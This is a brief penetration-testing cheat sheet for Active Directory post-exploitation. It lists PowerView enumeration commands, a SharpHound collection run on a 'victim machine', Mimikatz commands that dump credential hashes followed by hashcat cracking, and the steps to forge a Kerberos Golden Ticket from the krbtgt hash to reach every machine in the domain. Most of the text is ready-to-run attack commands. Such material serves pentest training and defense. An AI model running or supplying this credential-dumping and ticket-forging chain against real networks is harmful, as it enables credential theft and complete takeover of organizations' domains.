Priv Esc (Post Exploitation)

strategies involving AD pentest after initial compromise

Powerview

PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. Powerview is a part of Powersploit.

powershell -ep bypass

. .\PowerView.ps1

Enumerate Domain users: Get-NetUser | select cn

Enumerate Domain Groups: Get-NetGroup -GroupName admin

Find other OS running in the enterprise: Get-NetComputer -fulldata | select operatingsystem

Find shares: Invoke-ShareFinder

Find text files: Select-String -Path C:\Users*.txt -pattern <pattern>

Bloodhound and Sharphound

Installation:

apt-get install bloodhound

neo4j console => default credentials -> neo4j:neo4j

On the victim machine we need to download sharphound and then:

powershell -ep bypass . .\Downloads\SharpHound.ps1 Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip

Then we transfer the zip file to local system and run bloodhound

bloodhound

Dump hashes w/ Mimikatz

mimikatz.exe privilege::debug lsadump::lsa /patch hashcat -m 1000 rockyou.txt

Create Golden Ticket w/ Mimikatz

lsadump::lsa /inject /name:krbtgt

Take a note of the items marked in red, as they will be required in the next command

kerberos::golden /user:<Administrator> /domain:<controller.local> /sid:<s-1-5-....*> /krbtgt:<NTLM> /id:1103

Use the Golden Ticket to access other machine -

misc::cmd - This will open a new command prompt with elevated privileges to all machines

Access other Machines! - You will now have another command prompt with access to all other machines on the network